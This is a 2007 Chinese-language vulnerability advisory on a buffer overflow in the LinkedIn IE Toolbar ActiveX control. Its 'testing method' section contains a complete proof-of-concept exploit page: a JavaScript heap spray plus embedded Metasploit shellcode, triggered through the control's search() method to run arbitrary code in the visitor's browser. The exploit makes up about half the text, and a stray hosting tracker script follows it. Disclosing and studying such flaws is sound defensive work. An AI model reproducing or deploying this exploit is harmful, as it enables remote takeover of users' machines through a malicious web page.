发布日期：2007-07-24
更新日期：2007-07-25

受影响系统：

LinkedIn IE Toolbar 3.0.2.1098

描述：

---

BUGTRAQ  ID: 25032

LinkedIn是一个联网工具，帮助用户在线寻找各类工作或业务联系人。

LinkedIn的IEToolbar.IEContextMenu.1 ActiveX控件实现上存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制用户机器。

LinkedIn工具栏的IEToolbar.IEContextMenu.1（LinkedInIEToolbar.dll）控件在处理Search()方式时将VARIANT用作了varBrowser参数，如果用户受骗访问了恶意网页的话就可能触发缓冲区溢出，导致在用户浏览器会话中执行任意指令。

<*来源：Jared DeMott
        Justin Seitz
  
  链接：http://secunia.com/advisories/26181/
        http://www.vdalabs.com/tools/linkedin.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<HTML>
<TITLE>In God We Trust, VDA Labs, LLC</TITLE>
<HEAD>
<object classid='clsid:0F2437D6-C4E4-42CA-A906-F506E09354B7' id='target'></object>
<script language='javascript'>  

   function repeat(n,c)
   {
    retval="";
    for (i=0;i<n;i++)
     retval = retval + c;
    return retval
   }

   //EAX contains this value.  call [eax].  that lands us on the nops.
   blind_jmp = repeat(50000,unescape("%u0a0a%u0a0a"));  

   //shellcode:  From metasploit.com. SC can be very big if you want.
   shellcode = unescape("%uc931%ue983%ud9dd%ud9ee%u2474%u5bf4%u7381%ub213%u28cd%u837b%ufceb%uf4e2%u254e%u7b6c%ucdb2%u3ea3%u468e%u7e54%uccca%uf0c7%ud5fd%u24a3%ucc92%u32c3%uf939%u7aa3%ufc5c%ue2e8%u491e%u0fe8%u0cb5%u76e2%u0fb3%u8fc3%u9989%u7f0c%u28c7%u24a3%ucc96%u1dc3%uc139%uf063%ud1ed%u9029%ud139%u7aa3%u4459%u5f74%u0eb6%ubb19%u46d6%u4b68%u0d37%u7750%u8d39%uf024%ud1c2%uf085%uc5da%u72c3%u4d39%u7b98%ucdb2%u13a3%u928e%u8d19%u9bd2%u83a1%u0d31%u2b53%ub3da%u99f0%ua5c1%u85b0%uc338%u847f%uae55%u1749%ue3d1%u034d%ucdd7%u7b28");

   //the nops are executable and deref to the same spot
   nops = repeat(3925, unescape("%u0a0a%u0a0a") );
  
   mem = new Array();
   for(i=0; i<9000; i++)
   {
    mem[i] = nops+shellcode;
   }

   //make string
   target.search("jared", blind_jmp);

</script>
</body>
</html>
<!-- text below generated by server. PLEASE REMOVE --><!-- Counter/Statistics data collection code --><script language="JavaScript" src="http://hostingprod.com/js_source/geov2.js"></script><script language="javascript">geovisit();</script><noscript><img src="http://visit.webhosting.yahoo.com/visit.gif?us1185348172" alt="setstats" border="0" width="1" height="1"></noscript>

建议：

---

厂商补丁：

LinkedIn
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.linkedin.com/static?key=browser_toolbar_download

浏览次数：3384
严重程度：0（网友投票）